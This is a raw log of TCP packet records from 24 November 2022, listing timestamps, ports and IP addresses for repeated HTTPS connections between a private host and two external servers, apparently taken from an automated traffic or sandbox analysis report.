Nov 24, 2022 12:21:22.187517881 CET	49918	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.187576056 CET	443	49918	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.187696934 CET	49918	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.188004017 CET	49918	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.188024044 CET	443	49918	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.188070059 CET	443	49918	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.248500109 CET	443	49917	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.248604059 CET	443	49917	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.248663902 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.248697996 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.249418020 CET	49917	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.249443054 CET	443	49917	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.343396902 CET	49919	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.343482018 CET	443	49919	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.343605042 CET	49919	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.343936920 CET	49919	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.343966007 CET	443	49919	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.344038963 CET	443	49919	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.372569084 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.372622967 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.372737885 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.373884916 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.373903990 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.422277927 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.422353029 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.423301935 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.423321009 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.427501917 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.427516937 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.468381882 CET	49921	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.468434095 CET	443	49921	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.468513966 CET	49921	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.468729019 CET	49921	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.468746901 CET	443	49921	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.468789101 CET	443	49921	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.555228949 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.555314064 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.555336952 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.555383921 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.555586100 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.555619955 CET	443	49920	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.555670023 CET	49920	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.577481985 CET	49922	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.577542067 CET	443	49922	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.577624083 CET	49922	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.577878952 CET	49922	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.577900887 CET	443	49922	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.577940941 CET	443	49922	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.674473047 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.674534082 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.674688101 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.675316095 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.675333023 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.702856064 CET	49924	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.702933073 CET	443	49924	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.703028917 CET	49924	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.703289032 CET	49924	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.703305960 CET	443	49924	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.703350067 CET	443	49924	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.723413944 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.725725889 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.730968952 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.730999947 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.731615067 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.731921911 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.732532024 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.732546091 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.827558994 CET	49925	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.827615976 CET	443	49925	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.827702999 CET	49925	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.827908039 CET	49925	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.827922106 CET	443	49925	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.827969074 CET	443	49925	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.846107006 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.846415997 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.846435070 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.846606016 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.846606016 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.846669912 CET	443	49923	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.846755981 CET	49923	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.936975002 CET	49926	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.937021971 CET	443	49926	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.937102079 CET	49926	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.937352896 CET	49926	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:22.937366962 CET	443	49926	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.937426090 CET	443	49926	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:22.964909077 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.964970112 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:22.965105057 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.965404987 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:22.965424061 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.016525030 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.016638994 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.022814989 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.022833109 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.023464918 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.023544073 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.024127007 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.024138927 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.062768936 CET	49928	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.062823057 CET	443	49928	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.062932968 CET	49928	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.063174009 CET	49928	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.063188076 CET	443	49928	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.063239098 CET	443	49928	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.134804010 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.134994030 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.135009050 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.135062933 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.135250092 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.135287046 CET	443	49927	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.135344982 CET	49927	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.187011003 CET	49929	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.187057972 CET	443	49929	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.187145948 CET	49929	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.187376976 CET	49929	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.187388897 CET	443	49929	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.187429905 CET	443	49929	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.251719952 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.251763105 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.251975060 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.252440929 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.252455950 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.296627045 CET	49931	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.296695948 CET	443	49931	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.296801090 CET	49931	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.297036886 CET	49931	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.297060013 CET	443	49931	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.297112942 CET	443	49931	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.304511070 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.304721117 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.312155008 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.312175035 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.312762976 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.313172102 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.313608885 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.313621998 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.405827045 CET	49932	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.405914068 CET	443	49932	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.406052113 CET	49932	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.406332970 CET	49932	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.406361103 CET	443	49932	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.406414986 CET	443	49932	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.413497925 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.413616896 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.414122105 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.414122105 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.515151978 CET	49933	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.515218019 CET	443	49933	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.515299082 CET	49933	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.515539885 CET	49933	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.515562057 CET	443	49933	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.515608072 CET	443	49933	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.520564079 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.520632982 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.520745993 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.521167994 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.521192074 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.569617987 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.569736958 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.570378065 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.570398092 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.575102091 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.575126886 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.624542952 CET	49935	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.624608040 CET	443	49935	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.625648975 CET	49935	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.625931025 CET	49935	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.625953913 CET	443	49935	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.625998020 CET	443	49935	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.681864977 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.682954073 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.682977915 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.683052063 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.683176994 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.683212042 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.683475018 CET	443	49934	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.683549881 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.686597109 CET	49934	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.734334946 CET	49936	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.734392881 CET	443	49936	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.734523058 CET	49936	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.734832048 CET	49936	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.734848976 CET	443	49936	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.734905958 CET	443	49936	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.798432112 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.798500061 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.798635006 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.799068928 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.799083948 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.843283892 CET	49938	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.843324900 CET	443	49938	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.843586922 CET	49938	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.843754053 CET	49938	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.843774080 CET	443	49938	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.843825102 CET	443	49938	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.847697973 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.847839117 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.853198051 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.853234053 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.854563951 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.859042883 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.859623909 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.859637022 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.890199900 CET	49930	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.890255928 CET	443	49930	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.952795982 CET	49939	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.952869892 CET	443	49939	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.952979088 CET	49939	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.953221083 CET	49939	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:23.953253984 CET	443	49939	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.953351021 CET	443	49939	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:23.989696980 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.989783049 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.989799976 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:23.990118980 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.990401030 CET	49937	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:23.990417957 CET	443	49937	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.064691067 CET	49940	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.064752102 CET	443	49940	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.064851999 CET	49940	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.065171957 CET	49940	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.065201044 CET	443	49940	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.065253019 CET	443	49940	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.096054077 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.096101999 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.096209049 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.096626997 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.096642017 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.147571087 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.147655010 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.148401976 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.148413897 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.154011965 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.154030085 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.171530962 CET	49942	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.171590090 CET	443	49942	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.172013044 CET	49942	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.172013044 CET	49942	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.172055960 CET	443	49942	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.172207117 CET	443	49942	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.265486002 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.265639067 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.266202927 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.266202927 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.281845093 CET	49943	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.281913996 CET	443	49943	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.285557032 CET	49943	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.285859108 CET	49943	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.285896063 CET	443	49943	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.285953045 CET	443	49943	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.376807928 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.376878023 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.377001047 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.377461910 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.377486944 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.390290976 CET	49945	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.390414953 CET	443	49945	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.390547037 CET	49945	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.390754938 CET	49945	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.390777111 CET	443	49945	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.390899897 CET	443	49945	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.429819107 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.429904938 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.430680037 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.430704117 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.435329914 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.435363054 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.499711990 CET	49946	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.499797106 CET	443	49946	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.499919891 CET	49946	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.500153065 CET	49946	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.500907898 CET	443	49946	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.501003027 CET	49946	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.537830114 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.537909031 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.537930965 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.538203955 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.538204908 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.538283110 CET	443	49944	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.538363934 CET	49944	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.577295065 CET	49941	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.577336073 CET	443	49941	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.609297037 CET	49947	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.609357119 CET	443	49947	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.609510899 CET	49947	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.609900951 CET	49947	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.609922886 CET	443	49947	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.609997034 CET	443	49947	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.641834021 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.641879082 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.642019033 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.642482996 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.642501116 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.691714048 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.691804886 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.697438955 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.697465897 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.698157072 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.698230028 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.698870897 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.698904991 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.718442917 CET	49949	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.718504906 CET	443	49949	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.718640089 CET	49949	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.718759060 CET	49949	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.718774080 CET	443	49949	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.718899965 CET	443	49949	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.802478075 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.802546978 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.802566051 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.802598953 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.802634001 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.802660942 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.802903891 CET	49948	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.802921057 CET	443	49948	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.829197884 CET	49950	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.829252005 CET	443	49950	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.829586029 CET	49950	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.829586029 CET	49950	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:24.829633951 CET	443	49950	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.829823971 CET	443	49950	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:24.908216953 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.908272982 CET	443	49951	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.908380032 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.908881903 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.908899069 CET	443	49951	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.951179981 CET	443	49951	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.951258898 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.951875925 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.951895952 CET	443	49951	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:24.955039024 CET	49951	443	192.168.2.3	172.66.43.60
Nov 24, 2022 12:21:24.955064058 CET	443	49951	172.66.43.60	192.168.2.3
Nov 24, 2022 12:21:25.015803099 CET	49952	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.015865088 CET	443	49952	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.015954018 CET	49952	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.016226053 CET	49952	443	192.168.2.3	51.195.77.208
Nov 24, 2022 12:21:25.016242981 CET	443	49952	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.016304016 CET	443	49952	51.195.77.208	192.168.2.3
Nov 24, 2022 12:21:25.088850021 CET	443	49951	172.66.43.60	192.168.2.3
